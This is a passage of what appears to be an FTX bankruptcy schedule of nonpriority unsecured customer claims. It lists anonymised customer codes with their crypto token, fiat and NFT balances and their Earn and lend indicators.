| 07423705 | | BAT[11.39809896], BRZ[1], CUSDT[2], SUSHI[.6975042], USD[0.01] | | |
| 07423711 | | DAI[.002528], ETH[0.00430669], ETHW[16.27188144], EUR[0.00], PAXG[0.00003315], SOL[.00748900], SUSHI[0.13690969], USD[0.00], USDT[0] | | |
| 07423713 | | DOGE[1], USD[0.00] | | |
| 07423714 | | BAT[1.01520106], BTC[.00250909], CUSDT[7], DOGE[3164.63324819], ETH[.03548563], ETHW[.03504787], SHIB[23758696.54909135], TRX[2], USD[5.07] | Yes | |
| 07423717 | | BTC[0], ETH[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07423722 | | BRZ[1], BTC[.00082917], DOGE[1], ETH[.02651169], ETHW[.02651169], USD[0.00] | | |
| 07423726 | | BAT[0], BCH[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], ETHW[0], GRT[0], SHIB[2328.04291118], SOL[0], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07423738 | | AAVE[.00782502], ALGO[.80204987], AVAX[.03188218], BAT[.88332528], BCH[.18827742], BRZ[3], BTC[0.00001764], DOGE[537.09549792], ETH[.0003809], ETHW[0.00038090], GRT[105.5111946], LINK[1.04515751], NEAR[.03226378], SHIB[57473.99010337], SOL[.00775388], SUSHI[19.32235994], TRX[31.92215183], UNI[.02661933], USD[0.00], USDT[0.00254880], YFI[.00098923] | Yes | |
| 07423742 | | BRZ[1], BTC[.00088551], CUSDT[9], DOGE[1267.96618399], SHIB[299068.07778807], SOL[1.16262888], USD[0.00] | Yes | |
| 07423745 | | USD[0.01] | Yes | |
| 07423748 | | AVAX[23.89805401], BAT[2.030322], BRZ[5.02196595], BTC[.3055815], CUSDT[2], DOGE[5732.07980808], ETH[1.34931472], ETHW[1.34880604], GRT[669.57741247], LINK[166.75297545], MATIC[473.65820478], SHIB[13], SOL[18.60536046], TRX[13.0478833], USD[2744.42] | Yes | |
| 07423751 | | AUD[0.00], BTC[0], CAD[0.00], CUSDT[0.00000001], ETH[0], TRX[.000002], USD[0.02075093], WBTC[0.00000001] | | |
| 07423752 | Contingent, Disputed | BTC[.00006213], DOGE[1], USD[7.31] | | |
| 07423758 | | ETHW[.942857], KSHIB[10710], MATIC[300], SOL[0], USD[0.74] | | |
| 07423761 | | DOGE[0], USD[0.00] | | |
| 07423765 | | SOL[.00928] | | |
| 07423766 | | BTC[.0000396], DOGE[.774], LINK[.092], USD[0.01] | | |
| 07423768 | | NFT (527640863583525688/Entrance Voucher #3452)[1], SOL[0.00000001], SUSHI[0], USD[0.00] | | |
| 07423776 | | BF_POINT[100], ETH[0.90971485], NFT (478700680235497728/Coachella x FTX Weekend 1 #7712)[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07423778 | | CUSDT[1], DOGE[1], TRX[226.7075154], USD[0.00] | | |
| 07423780 | | BRZ[1], CUSDT[1], DOGE[1], ETH[.00000086], ETHW[.09434762], SOL[.00004146], USD[0.00], USDT[0.00000012] | Yes | |
| 07423781 | | BRZ[1], DOGE[.0000048], TRX[1], USD[0.01] | | |
| 07423792 | | BRZ[1], BTC[0], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07423793 | | ETH[0] | | |
| 07423794 | | USDT[0] | | |
| 07423795 | | TRX[1], USD[0.53] | | |
| 07423807 | | SOL[53.38471443], USD[0.00] | | |
| 07423812 | | DOGE[38.844], USDT[.5843055] | | |
| 07423814 | | DOGE[2], USD[0.00] | | |
| 07423820 | | DOGE[0], SHIB[512545.01035949], USD[0.00] | Yes | |
| 07423833 | | BCH[.03624254], BTC[.00494233], CUSDT[5], DOGE[2165.22126001], ETH[.04620333], ETHW[.04562835], LINK[.00002688], LTC[.12758412], SHIB[1], TRX[.00065859], USD[61.84] | Yes | |
| 07423835 | | GRT[1.992], LINK[21.228], USD[0.67], USDT[3.73994726] | | |
| 07423839 | | CUSDT[3], DOGE[3], ETH[.12659868], ETHW[.12547405], TRX[1], USD[0.00] | Yes | |
| 07423858 | | USD[3.81] | | |
| 07423864 | | NFT (403073159692168614/FTX - Off The Grid Miami #1071)[1], USD[0.52] | | |
| 07423869 | | CUSDT[1], DOGE[1], ETH[0], LTC[0], USD[0.02] | | |
| 07423871 | | BRZ[1], CUSDT[2], DOGE[2], TRX[3], USD[0.01] | | |
| 07423872 | | BTC[.00172108], CUSDT[1], DOGE[497.0583046], TRX[1], USD[0.97] | | |
| 07423876 | | USD[0.01] | | |
| 07423888 | | BRZ[3], CUSDT[2], DOGE[0], SOL[8.97036133], TRX[5], USD[0.00], USDT[4.43823746] | Yes | |
| 07423896 | | NFT (544618176712527820/FTX - Off The Grid Miami #1250)[1] | | |
| 07423900 | | BRZ[1], CUSDT[1], DOGE[1], ETH[.25261229], ETHW[.25261229], TRX[1], USD[0.64] | | |
| 07423902 | | BAT[1.18171947], BRZ[2], DOGE[3], USD[0.00] | | |
| 07423909 | | DOGE[1], USD[0.00] | | |
| 07423911 | | BRZ[2], CUSDT[24], USD[0.03] | | |
| 07423914 | | AAVE[.05292889], USD[1.06] | Yes | |
| 07423925 | | CUSDT[8], DOGE[90.14634309], SHIB[1], SOL[.3175359], TRX[3], USD[1.00] | | |
| 07423935 | | DOGE[3], TRX[1432.70191727], USD[25.00] | | |
| 07423938 | | BTC[0], USDT[0.00040138] | | |
| 07423945 | | BRZ[2], CUSDT[20], DOGE[417.66968958], ETH[.00001498], ETHW[.00001498], TRX[.343045], USD[0.00] | | |
| 07423947 | | BTC[0], ETH[0], LINK[0], SOL[0], USD[0.00], USDT[0] | | |
| 07423948 | | DOGE[0], ETH[2.64421301], ETHW[0], LTC[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07423957 | | CUSDT[1], DOGE[1], TRX[.00004847], USD[0.00] | | |
| 07423958 | | TRX[0], USD[0.00] | Yes | |
| 07423969 | | BTC[0.00005122], ETH[0], SOL[0], USD[0.00], USDT[0], WBTC[0] | | |
| 07423972 | | GRT[5.46867561], USD[5.00] | | |
| 07423973 | | SOL[.0042], TRX[.216], USD[193.26] | | |
| 07423991 | | BF_POINT[200], BRZ[2], BTC[.05991396], CUSDT[4], DOGE[327.19756546], ETH[.40227333], ETHW[.40210451], LINK[36.39327576], MATIC[516.06261182], SHIB[13619322.26025856], TRX[7], USD[0.00] | Yes | |
| 07423992 | | SOL[28.311] | | |
| 07423996 | | BAT[.961], DOGE[.964], ETH[.000963], ETHW[.000963], GRT[.935], LINK[.0962], LTC[.00749], MATIC[9.93], SUSHI[.4915], TRX[.077], USD[0.04] | | |
| 07424007 | | KSHIB[4.98], NFT (573345273761483710/Digitized Paul in his natural environment)[1], USD[135.18] | | |
| 07424013 | | BTC[0], DOGE[1.11641796], TRX[1], USD[0.00] | | |
| 07424021 | | BRZ[1], CUSDT[6], SOL[.00004468], TRX[4], USD[0.76], USDT[2.19449027] | Yes | |
| 07424024 | | ETH[0], ETHW[0], LTC[0], SOL[0], TRX[0], USD[0.00] | | |
| 07424026 | | CUSDT[4], DOGE[161.28097494], TRX[2], USD[0.01] | Yes | |
| 07424036 | | CUSDT[1], USD[0.00], USDT[9.9470557] | | |
| 07424037 | | BAT[1.0165555], BRZ[3], DOGE[5772.96450616], ETH[.00000055], ETHW[.00000055], GRT[404.4572395], SHIB[139377184.92862763], TRX[5386.89415408], USD[0.00] | Yes | |
| 07424039 | | NFT (526169902914700280/Miami Ticket Stub #97)[1] | | |
| 07424049 | | DOGE[16453.56827712], GRT[1], USD[0.00] | | |
| 07424052 | | BTC[0], DOGE[0], SUSHI[0], USD[0.01], USDT[0] | Yes | |
| 07424056 | | USD[2550.00] | | |
| 07424060 | | ETHW[.00005], USD[0.04] | | |
| 07424062 | | ETH[.00098445], ETHW[.00098445], MATIC[.0055], SOL[0.00038250], TRX[0], USD[1041.50] | | |
| 07424068 | | BTC[0.00002115], USDT[.87891] | | |
| 07424070 | | NFT (575204666558838400/Entrance Voucher #3776)[1] | | |
| 07424072 | | CUSDT[4523.65402137], DOGE[12288.59240295], TRX[1175.46653381], USD[0.00] | | |
| 07424073 | | DOGE[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07424075 | | BTC[0], GRT[4.995], LINK[.1998], SHIB[99900], SOL[.0099], TRX[.000107], USD[0.01] | | |
| 07424077 | | BTC[.00016821], DOGE[2011.64265326], TRX[1], USD[0.00] | | |
| 07424081 | | ETH[0] | | |
| 07424082 | | BTC[.00016653], USD[0.00] | Yes | |
| 07424085 | | USD[3.09] | | |
| 07424098 | | NFT (482636164018654949/Imola Ticket Stub #49)[1], SUSHI[.3119], USD[1.88], USDT[.22064544] | | |
| 07424106 | | CUSDT[1], DOGE[6326.07445547], SHIB[3455425.01727712], TRX[1], USD[299.61] | | |
| 07424109 | Contingent, Disputed | USD[0.03] | | |
| 07424111 | | CUSDT[6], DOGE[1], ETH[0], TRX[2], USD[0.00] | | |
| 07424112 | | USD[0.00] | | |
| 07424124 | | CUSDT[2], DOGE[995.82387196], TRX[706.08746244], USD[0.00] | | |
| 07424127 | | BTC[0], SOL[0], USD[0.00] | | |
| 07424146 | | NFT (465430569247258459/DOGO-IN-500 #1496)[1], NFT (478375762774442870/Entrance Voucher #2858)[1], SOL[0], USD[0.00], USDT[0.00000048] | | |
| 07424150 | | LTC[1.6533] | | |
| 07424160 | | LINK[0], SOL[0], USD[0.00], USDT[0.00000361] | | |
| 07424161 | | DOGE[1], ETH[.0327194], ETHW[.032309], USD[0.00] | Yes | |
| 07424163 | | CUSDT[32], DOGE[4445.60331374], TRX[2254.80425251], USD[0.00] | Yes | |
| 07424170 | | USD[1.90], USDT[0.24784390] | | |
| 07424175 | | USD[0.77] | | |
| 07424180 | | CUSDT[27], DOGE[.00004177], TRX[2.00003593], USD[0.01] | Yes | |
| 07424196 | | BRZ[2], BTC[.00000039], CUSDT[11], DOGE[.71020043], GRT[1], TRX[2], USD[1.81], USDT[0.89411140] | | |
| 07424201 | | BTC[0], SHIB[10100000], SOL[.708], USD[1.77] | | |
| 07424203 | | BTC[0], ETH[0], SOL[0], USD[0.00] | | |
| 07424204 | | BTC[0.00002078], DAI[.02365401], ETH[0], SOL[0.00700000], USD[0.23], USDT[0.00000008] | | |
| 07424214 | | CUSDT[7], TRX[2], USD[0.01] | Yes | |
| 07424216 | | BTC[.00134662], DOGE[11.59203389], ETH[.01399711], ETHW[.01399711], LTC[.58372251], MATIC[122.66607745], SOL[.00000257], SUSHI[.05483679], USD[8.88], USDT[0.00297803] | | |
| 07424218 | | CUSDT[0.00000006], DOGE[0], TRX[5.65101096], USD[0.00], USDT[0] | | |
| 07424224 | | BRZ[2], CUSDT[19], DOGE[0], TRX[2], USD[0.01] | | |
| 07424225 | | CUSDT[523.29865047], DOGE[363.89939547], KSHIB[23317.45805437], TRX[13116.76419837], USD[3.96] | Yes | |
| 07424233 | | BTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07424235 | | BTC[.00004583], TRX[1], USD[4.92] | | |
| 07424238 | | BTC[0], CAD[0.00], DOGE[0], ETH[0], EUR[0.00], GBP[0.00], MATIC[0], SGD[0.00], SHIB[45.91199822], USD[0.00], USDT[0] | Yes | |
| 07424239 | | TRX[.903001] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07424247 | | DOGE[31073], NFT (467918145351348907/Cool Bean #4821)[1], USD[0.00], USDT[0.13244976] | | |
| 07424255 | | BTC[0], SOL[0] | | |
| 07424256 | | BAT[1], GRT[1], TRX[1], USD[0.00] | | |
| 07424259 | | ALGO[0], BTC[.00000021], DOGE[1], USD[56.41], USDT[0] | | |
| 07424262 | | BRZ[2], USD[0.00], USDT[1] | | |
| 07424264 | | BTC[0], SOL[0], USD[0.00] | | |
| 07424265 | | BAT[2], BRZ[1], CUSDT[5], ETH[0], SOL[0], TRX[3], USD[0.00], USDT[1] | | |
| 07424267 | | BTC[.0018] | | |
| 07424270 | | DOGE[1.4090386], USD[0.00] | | |
| 07424272 | | BF_POINT[100], BRZ[1], CUSDT[6], DOGE[1], ETHW[.98480154], TRX[2], USD[0.02], USDT[1.00045669] | Yes | |
| 07424274 | | ETHW[.50647204], USD[2110.08] | | |
| 07424277 | | CUSDT[10], DOGE[3237.5169586], TRX[6], USD[4.09] | | |
| 07424280 | | BTC[0], CUSDT[2], GRT[0], TRX[1], USD[0.01], USDT[0] | | |
| 07424282 | | BAT[1], TRX[1], USD[0.00] | | |
| 07424288 | | USD[0.00] | | |
| 07424292 | | BTC[0.12480440], DOGE[10964.78348198], ETH[1.09100252], ETHW[1.09054436], MATIC[1014.00049239], NFT (437813527661838522/FTX - Off The Grid Miami #1798)[1], SOL[22.36832813], USD[0.00] | Yes | |
| 07424293 | | DOGE[183.92355613], TRX[307.770411], USD[0.00] | Yes | |
| 07424295 | | ETH[.00000001], ETHW[0], SOL[154.99700000], USD[2.55], USDT[0] | | |
| 07424297 | | USD[0.00] | | |
| 07424300 | | BRZ[1], CUSDT[3], DOGE[1], SOL[.00005424], TRX[3], USD[0.00] | Yes | |
| 07424314 | | USD[0.00] | | |
| 07424319 | | USD[0.00] | | |
| 07424320 | | BRZ[1], CUSDT[4], GRT[1], TRX[3], USD[0.01] | | |
| 07424322 | | ETH[0], SOL[0], USD[0.00], USDT[0] | | |
| 07424325 | | DOGE[0.28948843], USD[0.00] | | |
| 07424326 | | BTC[.00056602], USD[0.00] | | |
| 07424327 | | BRZ[2], BTC[.00000055], CUSDT[2], SHIB[4], TRX[3], USD[978.78] | Yes | |
| 07424332 | | BTC[0], NFT (534728854721968986/#833735383050508010726371144515648734667905819739973493237215878036798979964247)[1], SOL[0], USD[4.31], USDT[0.00000001] | | |
| 07424337 | | BF_POINT[200] | Yes | |
| 07424338 | | NFT (352100191128550958/Coachella x FTX Weekend 1 #19531)[1] | | |
| 07424342 | | CUSDT[6], DOGE[1598.93727975], SHIB[152081.05153042], TRX[206.32195016], USD[0.02] | Yes | |
| 07424343 | | BTC[.00170912], CUSDT[1], USD[0.00] | | |
| 07424354 | | BTC[.00023925], SOL[.532] | | |
| 07424355 | | USD[0.00] | | |
| 07424358 | | ETH[.87583679], ETHW[.87583679], MATIC[0], SOL[36.84641399], USD[0.00] | | |
| 07424360 | | USD[0.00], USDT[56.05485815] | Yes | |
| 07424361 | | BTC[.00042802], DOGE[133.29426802], ETH[.02389331], ETHW[.02389331], SOL[.9816476], USD[0.00] | | |
| 07424362 | Contingent, Disputed | BTC[0], USD[0.00] | | |
| 07424364 | | LTC[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07424367 | | USD[0.00] | | |
| 07424369 | | CUSDT[1], DOGE[108.99087546], USD[0.00] | | |
| 07424372 | | BTC[0.02104255], ETH[0], USD[-11.59], USDT[0] | | |
| 07424373 | | DOGE[588.124], USDT[.84118924] | | |
| 07424374 | | CUSDT[1], ETH[.00001584], ETHW[.00001584], TRX[1], USD[644.24] | | |
| 07424376 | | AAVE[.00009], BTC[0.18699049], ETH[0.50071551], ETHW[0.00072776], LINK[.099545], SOL[.000484], SUSHI[.336], UNI[.006335], USD[6235.22], USDT[725.75390541] | | |
| 07424377 | | CUSDT[1], SOL[7.00804169], USD[0.00] | | |
| 07424381 | | BRZ[5], CUSDT[3], SOL[.00678084], USD[1.47] | | |
| 07424384 | | LINK[18.5888], USD[0.00], USDT[5.22291438] | | |
| 07424390 | | USD[0.00] | | |
| 07424392 | | BAT[3.20098684], BRZ[10.71503007], CUSDT[12], DOGE[9.40110356], ETH[.24638823], ETHW[1.24621719], GRT[1], SOL[85.49817462], TRX[13.22133521], UNI[1.05840189], USD[12675.16], USDT[2.16661943] | Yes | |
| 07424394 | | BTC[0], USD[0.00] | | |
| 07424400 | Contingent, Disputed | BTC[0], USD[0.00], USDT[0.00005527] | | |
| 07424401 | | DOGE[0], USD[0.03] | | |
| 07424403 | | BAT[1], BRZ[1], DOGE[10000.00002612], USD[0.01] | | |
| 07424405 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07424416 | | USD[500.00] | | |
| 07424421 | | DOGE[1], USDT[0] | | |
| 07424422 | | CUSDT[1], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07424426 | | ALGO[.934995], LTC[.00072058], SHIB[84994.05022537], SOL[.0093994], SUSHI[.4791771], UNI[.05120868], USD[568.01] | | |
| 07424431 | | CUSDT[4], DOGE[.01859482], GRT[1], TRX[2], USD[0.01] | | |
| 07424433 | Contingent, Unliquidated | AVAX[0], BTC[0.00000001], ETH[0], NFT (478583065735174767/Humpty Dumpty #148)[1], SOL[0], TRX[0], USD[2166.65] | Yes | |
| 07424435 | | ETHW[0.00000333], NFT (489470998070134549/Bahrain Ticket Stub #322)[1], USD[1.02] | | |
| 07424441 | | SOL[8.51910905], USD[0.15] | | |
| 07424442 | | BTC[0.01957987], DOGE[0], ETH[0], GRT[0], LINK[0], SUSHI[0], USD[0.23], USDT[0.00182599], WBTC[0], YFI[0] | | BTC[.019535] |
| 07424445 | | BRZ[2], CUSDT[1], DOGE[9.10757664], TRX[1], USD[0.00] | | |
| 07424451 | | USD[3.17] | | |
| 07424458 | | USD[20.00] | | |
| 07424459 | | BTC[.000185] | | |
| 07424460 | | BRZ[2], CUSDT[5], MATIC[119.90284146], USD[0.00] | Yes | |
| 07424461 | | BAT[1], USD[0.00] | | |
| 07424462 | | BTC[.00008853], USD[0.00] | | |
| 07424464 | | CUSDT[1], GRT[1], SOL[.00004118], USD[0.01] | | |
| 07424467 | | BRZ[1], CUSDT[2], DOGE[1], GRT[1], SHIB[1], TRX[2], USD[0.01] | Yes | |
| 07424468 | | CUSDT[4], DOGE[44.26174029], LINK[0], TRX[1], USD[0.00] | | |
| 07424479 | | TRX[25.896], USD[0.04] | | |
| 07424480 | | USDT[110] | | |
| 07424482 | | BTC[0], CUSDT[4], DOGE[0], ETH[0], LINK[0], MATIC[0], NEAR[0], SHIB[33.19025490], SOL[0], TRX[2.00002800], USD[6.19], USDT[0] | Yes | |
| 07424483 | | ETH[0], LTC[0], USD[0.00], USDT[0] | | |
| 07424485 | | BRZ[1], CUSDT[2], ETH[2.47511439], ETHW[2.47511439], SHIB[1], USD[0.00] | | |
| 07424487 | | CUSDT[2], TRX[2], USD[0.46], USDT[0] | | |
| 07424488 | | USD[0.00], USDT[0] | | |
| 07424493 | | BTC[.00308683], DOGE[4], ETH[.03664372], ETHW[.03664372], SHIB[1], USD[0.00] | | |
| 07424494 | | USD[0.00] | | |
| 07424495 | | CUSDT[6], DOGE[0.62185724], USD[0.01] | | |
| 07424496 | | BTC[0], ETH[0], LINK[0], SHIB[200000], USD[0.64], USDT[0] | | |
| 07424498 | | BRZ[1], DOGE[24595.98967027], SHIB[19961228.50827246], SOL[1.58351898], SUSHI[21.10664593], TRX[1], USD[0.00] | Yes | |
| 07424500 | | USD[0.00] | | |
| 07424502 | | SHIB[54], SOL[0.00004554], USD[0.00] | Yes | |
| 07424503 | | BRZ[1], LINK[5.7056056], USD[0.00] | | |
| 07424507 | | CUSDT[3], TRX[1397.29537528], USD[0.00] | | |
| 07424512 | | DAI[1.97931967], USD[0.00] | | |
| 07424516 | | BTC[0.02076267], ETH[.34608955], ETHW[.34608955], LINK[14.29043067] | | |
| 07424517 | | BTC[.00017559], DOGE[4], LINK[.35469363], LTC[.43599658], SOL[4.12732346], SUSHI[.98271062], USD[0.00], YFI[.00028243] | | |
| 07424519 | | USD[0.00] | | |
| 07424521 | | ETH[.000784], ETHW[.000784], USD[0.00] | | |
| 07424523 | | USD[0.01] | | |
| 07424524 | | BRZ[3], BTC[0.00760852], CUSDT[19], DOGE[308.26343290], LINK[1.28547984], MATIC[43.31834707], TRX[6], USD[1.00], USDT[0.00000195] | | |
| 07424525 | Contingent, Disputed | BAT[1], DOGE[1], USD[0.00] | | |
| 07424530 | | USD[0.00], USDT[0] | | |
| 07424531 | | SHIB[2], USD[563.29] | Yes | |
| 07424532 | | USD[0.05] | | |
| 07424538 | Contingent, Disputed | DOGE[450.192], USD[394.60], USDT[0] | | |
| 07424540 | | DOGE[1], USD[0.00] | | |
| 07424544 | | BAT[0], BTC[0], CUSDT[9.08923901], DOGE[0], ETH[0], ETHW[0], GRT[0], PAXG[0], SOL[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07424545 | | BTC[0.09534700], MATIC[539.46], SOL[108.74185335], SUSHI[99.03580252], TRX[3478.81283534], USD[10.62] | | |
| 07424546 | | NFT (342930522392286696/Coachella x FTX Weekend 1 #2027)[1] | | |
| 07424551 | | LTC[.00512937], SOL[0], USD[2.31], USDT[1.69220302] | | |
| 07424555 | | USD[0.00] | | |
| 07424571 | | DOGE[1], GRT[1], SOL[.00004583], USD[0.01] | Yes | |
| 07424572 | | USD[0.00] | | |
| 07424580 | | DOGE[1], ETH[.10821717], ETHW[.10712476], TRX[2], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07424582 | | NFT (290169548508252441/Marcus Allen's Playbook: Kansas City Chiefs vs. Detriot Lions - November 29, 1996 #44)[1], NFT (290909061095716819/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #43)[1], NFT (154604943384459204/Tim Brown's Playbook: Michigan State vs. Notre Dame - September 19, 1987 #37)[1], NFT (317183219304805882/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #88)[1], NFT (328993411747964531/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders - December 9, 2001 #33)[1], NFT (381204984896585260/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #37)[1], NFT (381811995635128303/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #47)[1], NFT (403579222609691635/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #78)[1], NFT (431670965791255448/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #52)[1], NFT (433370966380562213/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #86)[1], NFT (437026931241785898/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #45)[1], NFT (456073014157352339/Shannon Sharpe's Playbook: Denver Broncos vs. Los Angeles Raiders - January 9, 1994 #37)[1], NFT (487788020789001469/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #51)[1], NFT (518556374010355759/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #44)[1], NFT (526489876894507960/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #71)[1], NFT (549811704820277274/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1988 #38)[1], NFT (556673587951824072/Australia Ticket Stub #500)[1], NFT (568079957135505006/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #61)[1], USD[7.57] | Yes | |
| 07424587 | | CUSDT[10], DOGE[2627.35134841], TRX[3134.7897677], USD[0.00] | Yes | |
| 07424588 | | BTC[.04493845], CUSDT[20.75], DOGE[272.52333549], ETH[0.03002766], SHIB[1739214.12321418], USD[0.00], YFI[.00155252] | Yes | |
| 07424589 | | AVAX[.051], ETHW[.00001192], LINK[.01108736], MATIC[.9152467], NFT (540244417392418367/Bahrain Ticket Stub #1608)[1], SOL[.00253848], USD[0.01] | | |
| 07424590 | | USD[0.17] | | |
| 07424594 | | BRZ[1], CUSDT[2], DOGE[1], USD[0.00], USDT[0] | | |
| 07424596 | | ETH[0], ETHW[0], SOL[0.00000001], USD[0.00], USDT[0.00000043] | | |
| 07424597 | | BRZ[4], BTC[0], DOGE[2584.04551899], ETH[0], GRT[0], SHIB[32], SOL[0], TRX[11.011553], USD[0.00], USDT[44.27729241] | Yes | |
| 07424600 | | SOL[0], USD[0.00] | | |
| 07424601 | | CUSDT[4689.91839781], USD[250.00] | | |
| 07424603 | | AAVE[0], BAT[10.13932839], BCH[0], BRZ[24.4104044], BTC[0], COMP[.00000001], CUSDT[18], DOGE[0], ETH[0], ETHW[0.04025858], GRT[0], LINK[0], LTC[0], MATIC[0], MKR[0], NFT (354156946559477133/Reawaken, by Wetiko and Remixed by Degen Poet For FTX #3)[1], SHIB[60], SOL[0.07530461], SUSHI[1.02197551], TRX[1.12218787], UNI[0], USD[1407.35], USDT[0], YFI[0] | Yes | |
| 07424608 | | ETH[.00330701], ETHW[.00330701], USD[-2.11], USDT[0] | | |
| 07424609 | | BTC[0], USD[0.00], USDT[0] | | |
| 07424610 | | TRX[2], USD[0.01] | | |
| 07424613 | | AAVE[0], BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0.00047544], ETHW[0], GRT[0], KSHIB[0], LINK[0], LTC[0], MATIC[0], MKR[0], NFT (363257035672672235/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #61)[1], NFT (378451086934406291/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #55)[1], PAXG[0], SHIB[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00] | Yes | |
| 07424615 | | BRZ[1], CUSDT[1], DOGE[1445.17103302], GRT[1], LINK[57.1907333], TRX[2], USD[0.00] | | |
| 07424617 | | NFT (339668224632007505/Entrance Voucher #3029)[1], USD[0.01], USDT[0] | Yes | |
| 07424622 | | BTC[0.00383154], DOGE[3606.83704462], ETH[.02419894], ETHW[.02419894], SHIB[2835905.72375902], USD[0.00] | | |
| 07424624 | | DOGE[8591.71391499], USD[0.00] | | |
| 07424626 | | SOL[138], USD[22.37] | | |
| 07424627 | | BAT[1], BRZ[6.11042811], BTC[0.00027877], CUSDT[10], DOGE[0], ETH[0], ETHW[0], EUR[0.00], GRT[1.00498957], LINK[0], SHIB[12], SOL[0.28332183], SUSHI[0], TRX[29.67884156], USD[0.00], USDT[1.02029443] | Yes | |
| 07424630 | | CUSDT[20], DOGE[2890.15220694], TRX[346.50565893], USD[0.00] | | |
| 07424631 | | BTC[0], DOGE[0], ETH[0.28433385], ETHW[0.28433385], SHIB[1], USD[0.00], USDT[1] | | |
| 07424636 | | BAT[1.00170923], BTC[.01173991], CUSDT[10], ETH[.1734396], ETHW[.173171], NFT (390334649013821457/#9767)[1], SHIB[1], USD[182.93], USDT[0.00067693] | Yes | |
| 07424641 | | BTC[.04014605], ETH[.29626803], ETHW[.54607725], SHIB[1261780.23177734], USD[64.17] | Yes | |
| 07424642 | | CUSDT[1], TRX[1163.52844074], USD[0.00] | | |
| 07424645 | | BRZ[5.07952967], CUSDT[160.74711475], DOGE[6.00601212], ETH[0], ETHW[0], LINK[0], SOL[0], TRX[52.65654578], USD[0.00] | Yes | |
| 07424650 | | BCH[0], BTC[.00823519], ETH[0.02811425], ETHW[0.02776488], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07424653 | | BTC[.00314038], CUSDT[1], USD[0.00] | | |
| 07424655 | Contingent, Disputed | AVAX[0], BAT[0], BTC[0], KSHIB[0], MATIC[0], SHIB[18], SOL[0], USD[0.00] | | |
| 07424656 | | BTC[.00000001], SHIB[2], TRX[1], USD[0.14], USDT[0] | Yes | |
| 07424659 | | BRZ[124.31954866], BTC[.0016639], DOGE[1892.36149987], TRX[1], USD[0.00] | | |
| 07424669 | | BTC[.00317675], DOGE[596.49191721], ETH[0.03346023], ETHW[0.03304781], USD[0.00] | Yes | |
| 07424672 | | BTC[.0000652], LINK[.0228], SUSHI[.366], USD[160.04], USDT[0.00848000] | | |
| 07424673 | | USD[0.00] | | |
| 07424681 | | USD[0.00] | | |
| 07424683 | | USD[0.01] | | |
| 07424686 | | PAXG[.04057099], SUSHI[4.51569291] | | |
| 07424687 | | BAT[1], DOGE[2], USD[0.69], USDT[1] | | |
| 07424689 | | BCH[.00002651], BTC[0], CUSDT[3], ETH[0], TRX[0], USD[0.00], USDT[0.00000513], YFI[0] | Yes | |
| 07424691 | | BRZ[1], CUSDT[4], DOGE[.88302241], TRX[4], USD[0.50] | | |
| 07424695 | | USD[0.01], USDT[0] | | |
| 07424698 | | BTC[0], USD[57.36] | Yes | |
| 07424703 | | ETH[0] | | |
| 07424709 | | BTC[.02758714], DOGE[2], ETH[.2690531], USD[801.42] | | |
| 07424710 | | BTC[.01273881], CUSDT[266.54527709], DOGE[534.15054121], ETH[.01081158], ETHW[.01067468], NFT (407936842977228848/3D CATPUNK #3460)[1], SHIB[171691.99436747], SOL[8.22654166], TRX[168.78322116], USD[0.00] | Yes | |
| 07424714 | | BTC[.03359507], ETH[0.00010000], ETHW[0.00050000], SOL[0], USD[0.01] | | |
| 07424715 | | TRX[.000074], USD[0.05], USDT[0.00000001] | | |
| 07424717 | | BRZ[1], USD[0.00] | Yes | |
| 07424722 | | BTC[.01768445], SHIB[1.00000056], USD[0.00], USDT[0] | Yes | |

Amended Schedule F-7: Nonpriority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
